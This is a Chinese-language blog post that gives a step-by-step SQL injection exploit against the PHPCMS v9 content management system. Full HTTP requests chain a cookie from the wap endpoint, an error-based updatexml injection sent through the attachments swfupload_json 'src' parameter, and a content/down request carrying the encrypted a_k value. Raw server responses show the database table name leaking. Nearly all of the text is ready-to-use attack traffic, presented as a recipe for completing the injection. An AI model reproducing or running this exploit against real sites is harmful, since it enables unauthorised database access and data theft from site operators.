phpcms v9 注入

互联网
GET phpcms index php?m=wap&c=index&a=init&siteid=1 HTTP 1 1 Host: localhost Pro
GET /phpcms/index.php?m=wap&c=index&a=init&siteid=1 HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: nYbXT_siteid=8f34EZvyi7oJBh8g69s3wO0YGxWeF_ohQ8serAzU; CNZZDATA1256104530=

  

首先访问上述的url,返回的数据如下

HTTP/1.1 200 OK
Date: Tue, 11 Apr 2017 17:29:08 GMT
Server: Apache/2.4.9 (Win32) PHP/5.5.12
X-Powered-By: PHP/5.5.12
Set-Cookie: nYbXT_siteid=a504MiYFpsbeMmu-WUkntLfOSbQAJa61keJ3OvHN
Vary: Accept-Encoding
Content-Length: 35
Content-Type: text/html; charset=gbk

你访问的站点不存在或者未开启wap访问

复制上述返回数据中的红色cookie值

访问下述url

POST /phpcms/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id%3D%25%2A27%20and%20updatexml%281%2CCONCAT%281%2C%28SELECT%20table_name%20FROM%20information_schema.%60TABLES%60%20WHERE%20RIGHT%28table_name%2C10%29%3D%25%2A27admin_role%25%2A27%20LIMIT%200%2C1%29%29%2C1%29%23%26m%3D1%26f%3Dhaha%26modelid%3D2%26catid%3D7%26  HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: nYbXT_siteid=1464mbfPNyq9TWB2vKrI0h9yNabsKQf8NI4dqH3c; CNZZDATA1256104530=
Content-Length: 57

userid_flash=a504MiYFpsbeMmu-WUkntLfOSbQAJa61keJ3OvHN

  上述的src为sql注入的语句,post中的userid_flash为上述的红色cookie值

  返回如下:

HTTP/1.1 200 OK
Date: Tue, 11 Apr 2017 17:30:02 GMT
Server: Apache/2.4.9 (Win32) PHP/5.5.12
X-Powered-By: PHP/5.5.12
Set-Cookie: PHPSESSID=oj9abeufn86ajm9md7a2n8bjl4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: nYbXT_att_json=361aaa6lxxMUbdOiRKJjYjqdfLNj00tx1X6SSMesMq_-CijdCEwNjdwuPRyRpX-0E_xaXKzDfp1Bd-oAcmU73m91J-SA50PFYL-seSNzmnNqLEaBwILc3Nv00Eeg4a86xm3Jy_37V9YErAhYTFM7HEyHppebJGjwX-MlGr82wA8xOmR9P3Xm3HVQNdyPm57PUbuKBLJL1ZEoJXTLrpPWHpSFg2aXp32hU30c3TuXv_DQvzDYbUKZvZiFSSxgY4Le7IwgEyfeZzlfpOdtHUquuaVs-idCILJSNEq_6pKfqpX7Gz0edoDEuhYQLQ
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=gbk

  将上述标记颜色的值复制到一下payload中,即可完成注入

GET /phpcms//index.php?m=content&c=down&a_k=361aaa6lxxMUbdOiRKJjYjqdfLNj00tx1X6SSMesMq_-CijdCEwNjdwuPRyRpX-0E_xaXKzDfp1Bd-oAcmU73m91J-SA50PFYL-seSNzmnNqLEaBwILc3Nv00Eeg4a86xm3Jy_37V9YErAhYTFM7HEyHppebJGjwX-MlGr82wA8xOmR9P3Xm3HVQNdyPm57PUbuKBLJL1ZEoJXTLrpPWHpSFg2aXp32hU30c3TuXv_DQvzDYbUKZvZiFSSxgY4Le7IwgEyfeZzlfpOdtHUquuaVs-idCILJSNEq_6pKfqpX7Gz0edoDEuhYQLQ HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: nYbXT_siteid=; CNZZDATA1256104530=

  返回

HTTP/1.1 200 OK
Date: Tue, 11 Apr 2017 17:30:10 GMT
Server: Apache/2.4.9 (Win32) PHP/5.5.12
X-Powered-By: PHP/5.5.12
Vary: Accept-Encoding
Content-Length: 685
Content-Type: text/html; charset=gbk

<div style="font-size:12px;text-align:left; border:1px solid #9cc9e0; padding:1px 4px;color:#000000;font-family:Arial, Helvetica,sans-serif;"><span><b>MySQL Query : </b> SELECT * FROM `phpcms`.`v9_download_data` WHERE  `id` = '' and updatexml(1,CONCAT(1,(SELECT table_name FROM information_schema.`TABLES` WHERE RIGHT(table_name,10)='admin_role' LIMIT 0,1)),1)#' LIMIT 1 <br /><b> MySQL Error : </b>XPATH syntax error: 'v9_admin_role' <br /> <b>MySQL Errno : </b>1105 <br /><b> Message : </b> XPATH syntax error: 'v9_admin_role' <br /><a href='http://faq.phpcms.cn/?errno=1105&msg=XPATH+syntax+error%3A+%27v9_admin_role%27' target='_blank' style='color:red'>Need Help?</a></span></div>

  这个利用过程来自www.myhack58.com/Article/html/3/8/2017/85138_2.htm